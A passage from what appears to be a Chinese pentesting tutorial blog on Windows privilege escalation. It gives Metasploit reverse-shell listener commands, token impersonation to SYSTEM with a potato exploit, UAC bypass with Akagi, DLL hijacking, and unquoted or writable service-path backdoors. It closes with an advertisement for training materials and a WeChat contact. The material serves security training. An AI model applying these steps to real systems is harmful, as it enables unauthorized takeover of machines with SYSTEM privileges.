3、kali上 msf 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
exploit
4、假设将 shell.exe 后门通过之前的漏洞传到上传到目标靶机并点击CMD 执行后门程序
5、kali 监听到会话,是web普通权限
6、尝试用烂土豆配合令牌窃取提权,假设通过漏洞将烂土豆上传到目标服务器的C盘
然后执行以下命令,成功提权。
cd C:\\
execute -cH -f ./potato.exe
use incognito # 进入incognito
list_tokens -u # 列出令牌
impersonate_token "NT AUTHORITY\SYSTEM" # 令牌假冒 SYSTEM
MSF实现passUAC绕过
如果对方开了uac的话我们在对方的服务器上执行程序可能就会受到限制,为此,我们可以使用一些手段进行绕过uac的检测
用户账户控制 (User Account Control) 是Windows Vista (及更高版本操作系统)通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。
查看uac
设置不同的,计算机会对于windows操作设置时进行弹窗提醒
目标主机的UAC权限设置为最低
使用msfvenom选择windows模块设置IP端口生成木马,将木马放到目标主机上,在攻击机上使用msfconsole模块进行监听,在目标主机上执行后门,上线,绕过对方将uac的安全等级放置最低我们可以直接使用getsystem进行提权,就可以获取主机的system权限
就将普通的用户权限升级到了system权限
目标主机将权限设置为较高
使用msfvenom选择windows模块设置IP端口生成木马,将木马放到目标主机上,在攻击机上使用msfconsole模块进行监听,在目标主机上执行后门,上线,但是不能直接使用getsystem进行权限提升,我们需要会用uacbypass模块进行绕过上线
windows7使用bypassuad模块,进行system提权
windows10使用 ask模块配合管理员进行钓鱼实现uac的提权
相对而言条件比较苛刻,不推荐使用
Akagi项目实现passUAC
使用项目Akagi64/Akagi32进行提权
在cmd中执行Akagi64.exe 41 会弹出一个新的命令框,这个命令框的权限就是一个高权限的用户
在实际的运用过程中,我们使用webshell工具目标主机上就可以调用这个程序,然后使用msf进行监听后门就可以获取权限(PS:不同的主机需要使用不同id号码进行提权)
这种提权方式对于目标系统使用了较高的UAC权限较为好用,不用使用msf模块进行钓鱼操作
DLL劫持
因为计算机的一些系统文件我们无法操作查看和修改,为此我们关注的更多的是我们获得权限自身自带的DLL动态链接库
原理:利用msf生成后门dll文件覆盖掉之前的DLL文件,然后利用这个dll进行上线
使用工具进行检测查看哪些dll可以被劫持
如果出现的是test result就证明这个dll文件可以被劫持
如果出现的是no valid dllhjack!
就证明这个dll文件不可以被劫持
找到可以劫持的dll文件之后我们就可以使用msf生成带后门的dll文件
将生成的dll文件替代掉之前的dll文件
替换前的dll
替换后的dll
攻击者在进行端口监听
如果目标主机执行了这个程序就会上线
不带引号的路径问题
“C:\Program Files (x86)\Acunetix\wvs_supervisor.exe” 带有引号的路径、 C:\Program Files (x86)\Acunetix\wvs_supervisor.exe 有空格不带引号就会将C:\Program当做文件路径 将Files (x86)\Acunetix\wvs_supervisor.exe作为文件的参数
如果路径包含空格并且没有用引号引起来,Windows API 必须假定在哪里可以找到引用的应用程序。服务会按照以下顺序依次执行 C:\Program.exe
C:\Program Files\qcloud\tat_agent\tat_agent.exe
所以将木马命名为Program.exe,并将其放在C盘根目录,会使其优先执行
使用工具检测计算机系统中的所有程序,看他的安装目录里面是否加了引号,如果没有引号就会被晒选出来。然后我们看筛选出来的文件路径是都有空格,如果有空格就可以进行利用,利用msf模块生成一个后门文件,将这个后门文件的名字改为空格前面的文件名,在执行这个之前这个文件,执行这个服务过后,如果在攻击机上面进行监听的话就可以上线
看似启用的是之前的那个服务,实际上启用的是我们上传的后门文件
找到文件中有空格的文件
找到这种文件
将后门改为Program.exe文件,放到c盘目录下
计算机执行这个文件之后就会直接上线后门获取权限
程序执行的时候就会执行后门程序,不会执行原来的程序
修改服务程序的执行路径
本地提权
对权限控制不到位,导致用户可以更改服务执行的程序
服务的执行就是执行指定目录下的执行程序,但是有的服务的执行程序可以用修改,前期信息收集的时候,我们就可以使用工具来修改服务程序的路径,让服务启动的时候去执行我们的后门程序,我们在攻击机器上进行监听就可以获取到其计算机权限(修改服务对应的执行程序,将这个执行程序改为我们的后门程序就可以做到执行这个服务的时候来执行我们的后门程序从而实现上线)
使用windows自带的程序accesschk.exe文件,去检测计算机中存在哪些不安全的程序可以进行修改服务的执行路径。寻找的service_all_access的程序服务
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/0599139dfc60f99da2f809dfb0d24115.png)
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-bhtCMmic-1713030633566)]